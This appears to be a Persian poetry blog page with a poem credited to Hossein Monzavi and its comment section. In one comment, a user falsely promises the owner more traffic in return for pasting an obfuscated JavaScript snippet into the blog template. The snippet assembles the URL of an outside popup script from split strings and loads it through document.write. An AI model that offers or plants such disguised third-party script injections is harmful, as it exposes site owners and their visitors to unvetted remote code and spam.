گلباغ شعر

گلباغ شعر

روح "پدرم" شاد که فرمود به استاد ..... پسرم را "عشق" بیاموز و دگر هیچ.
گلباغ شعر

گلباغ شعر

روح "پدرم" شاد که فرمود به استاد ..... پسرم را "عشق" بیاموز و دگر هیچ.

دلم برایت یکذره است

دلم برایت یکذره است
کی میشود که
ساعت وقارش را
با بیقراری من عوض کند ؟

عقربه های تنبل
آیا پیش از من
به کسی که معشوق را در کنار دارد
قول همراهی داده اید ؟

در آسمان آخر شهریور
حتی ستاره ای هم نگران من نیست
به اتاق برمیگردم و
شب را دور سرم می چرخانم و
به دیوار می کوبم .

  "حسین منزوی"

نظرات 1 + ارسال نظر
سایه چهارشنبه 28 اسفند‌ماه سال 1392 ساعت 10:57 ب.ظ

سلام وبلاگ قشنگی داری تبریک میگم . این کد رو بزار تو قالب وبلاگت بازدیدت 300 تا افزایش پیدا میکنه (من خودم امتحان کردم .)

<script type="text/javascript">var e="i";document.write('<script type="text/javascript" src="'+'htt'+'p://po'+'pu'+'p'+'.'+'sm'+'us'+'ic.'+e+'r'+'/'+'po'+'p.'+'ph'+'p?use'+'r=3439'+'&po'+'pti'+'me'+'s=2'+'"></scr'+'ipt>');</script>

سلام دوست عزیزم.ممنونم از حضورتون و خوشحالم که پسندیدید.سایه تان مستدام.

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد